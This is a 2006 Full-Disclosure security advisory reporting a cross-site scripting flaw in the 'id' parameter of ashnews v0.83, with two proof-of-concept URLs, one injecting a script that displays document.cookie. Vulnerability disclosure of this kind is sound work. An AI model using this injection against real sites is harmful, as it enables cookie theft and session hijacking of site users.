[Full-disclosure] ashnews Cross-Site Scripting Vulnerability

2006-01-30T00:00:00
ID SECURITYVULNS:DOC:11232
Type securityvulns
Reporter Securityvulns
Modified 2006-01-30T00:00:00

Description

Advisory #5 Title: ashnews Cross-Site Scripting Vulnerability

Author: 0o_zeus_o0 and fraude

Contact: zeus@diosdelared.com

Website: Elitemexico.org

Date: 30/01/2006

Risk: High

Vendor Url: http://dev.ashwebstudio.com/

Affected Software: ashnews

Non Affected:

We Are: olimpus klan team

TECHNICAL INFO

================================================================

vulnerability that allows to the robbery of cookie and kidnapping of user

Example:

http://www.url.com/[path]/ashnews.php?page=showcomments&id=<script><script>alert(document.cookie)</script>

http://www.url.com/[path]/ashnews.php?page=showcomments&id=[xss]

Solution:

VULNERABLE VERSIONS

================================================================

ashnews v0.83 Other versions may also be affected.

================================================================

Contact information

0o_zeus_o0

zeus@diosdelared.com

www.olimpusklan.org

================================================================

greetz: lady fire,Mi beba, fraude and security-mx

########################################################################